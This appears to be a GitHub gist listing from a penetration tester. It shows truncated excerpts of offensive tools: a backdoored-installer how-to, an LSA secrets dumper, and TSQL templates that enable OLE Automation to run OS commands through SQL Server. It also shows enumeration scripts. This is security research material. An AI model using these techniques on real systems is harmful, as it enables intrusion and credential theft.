
Scott Sutherland nullbind

@nullbind
nullbind / BackDoor Setup Exe
Last active March 17, 2024 22:40
BackDoor Setup Exe
Author: Scott Sutherland, 2017
Description: Summary of how to backdoor an existing setup file in Windows.
Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing.
How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData
In this example, lyncsdk.exe will be used. It can be downloaded here: https://www.microsoft.com/en-us/download/details.aspx?id=36824
lyncentry.exe also works as an example.
Below are some basic instructions.
@nullbind
nullbind / Find-DbaSqlInstance Mock Up
Last active August 15, 2017 14:17
Find-DbaSqlInstance Mock Up
Function Find-DbaSqlInstance
{
<#
.SYNOPSIS
This function can be used to enumerate SQL Server instances using common methods.
.EXAMPLE
Check if the provided computer(s) or instance(s) respond to ping.
@nullbind
nullbind / lsasecretsdump-csharp.cs
Last active March 1, 2018 12:31
lsasecretsdump-csharp-workinprogress
using System;
using System.Text;
using System.Security.Principal;
using System.Runtime.InteropServices;
using Microsoft.Win32;
namespace lsautil
{
// https://msdn.microsoft.com/en-us/library/microsoft.win32.registry(v=vs.110).aspx
@nullbind
nullbind / Invoke-SQLOSCmdCLRWMIProvider.ps1
Last active September 18, 2017 23:31
PowerUpSQL Function - Invoke-SQLOSCmdCLRWMIProvider- PoC. Working but not stable.
# todo
<#
- Note: dependent on PowerUpSQL.
1 - have script accept command or source script as string
--- have that get baked into the wmi provider method
--- update the wmi method to execute the provided string as a script block
--- mod the clr to return the output of the wmi command
- roll into clone of the invoke-sqloscmdclr function so it can scale
- remove wmi cs and dll on client
- remove sql dll cs and dll on client
@nullbind
nullbind / sqlserver_cmdexec_oleautomation.txt
Last active June 7, 2017 15:52
This is a TSQL template for executing OS commands through SQL Server using OLE Automation Procedures
-- This is a TSQL template for executing OS commands through SQL Server using OLE Automation Procedures.
-- Enable Show Advanced Options
sp_configure 'Show Advanced Options',1
RECONFIGURE
GO
-- Enable OLE Automation Procedures
sp_configure 'Ole Automation Procedures',1
RECONFIGURE
@nullbind
nullbind / SQL Server - OS Cmdexec - Ole Automation Procedure Example
Last active January 14, 2021 00:15
SQL Server - OS Cmdexec - Ole Automation Procedure Example
-- set output directory to install sql server install dir
-- set output file to randomly generate name
-- show advanced options
sp_configure 'show advanced options',1
reconfigure
go
-- turn on ole automation
sp_configure 'Ole Automation Procedures',1
@nullbind
nullbind / Find-DbaSqlInstance.ps1
Last active February 12, 2018 07:32
Find-DbaSqlInstance
# Script: Find-DbaSqlInstance
# version 0.14.5
# Author: Scott Sutherland, 2018 NetSPI
# Contributions from: Warren F. (Invoke-Parallel), https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b
# ------------------------
# Current feature summary
# ------------------------
# 1 - Import list of IP addresses, computer names, or SQL instances from a file via "-SqlInstanceFile" param - works
@nullbind
nullbind / FindIIS6inNessus.ps1
Last active December 1, 2018 22:02
This script can be used to extract a list of IIS 6.x HTTP servers from .nessus files.
# This script can be used to extract a list of IIS 6.x HTTP servers from .nessus files.
# Author: Scott Sutherland, NetSPI 2017
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.
# Create an output table
$outputtbl =New-Object System.Data.DataTable
$outputtbl.Columns.Add("IpAddress") | Out-Null
$outputtbl.Columns.Add("IISVersion") | Out-Null
# Iterate through each host
@nullbind
nullbind / funwithtasks.ps1
Created March 17, 2017 20:55
Fun with Tasks
$schedule = new-object -com("Schedule.Service")
$schedule.connect()
$tasks = $schedule.getfolder("\").gettasks(0)
$entries = New-Object System.Collections.Generic.List[System.Management.Automation.PSObject]
$tasks |
ForEach-Object {
# Get task information
@nullbind
nullbind / enumerat_all_database_users_at_once.sql
Last active February 13, 2017 22:10
This script will enumerate all database users for the selected database. The SQL login must have a database user mapping or guest access. No other privileges are required.
-- Generate a sequence of candidate principal ids (1..10000) and resolve each one with USER_NAME();
-- ids that map to a real database user return a name, everything else returns NULL and is filtered out.
select n [id], USER_NAME(n) [user_name]
from (
-- cross join of spt_values against itself just provides enough rows to number
select top 10000 row_number() over(order by t1.number) as N
from master..spt_values t1
cross join master..spt_values t2
) a
where USER_NAME(n) is not null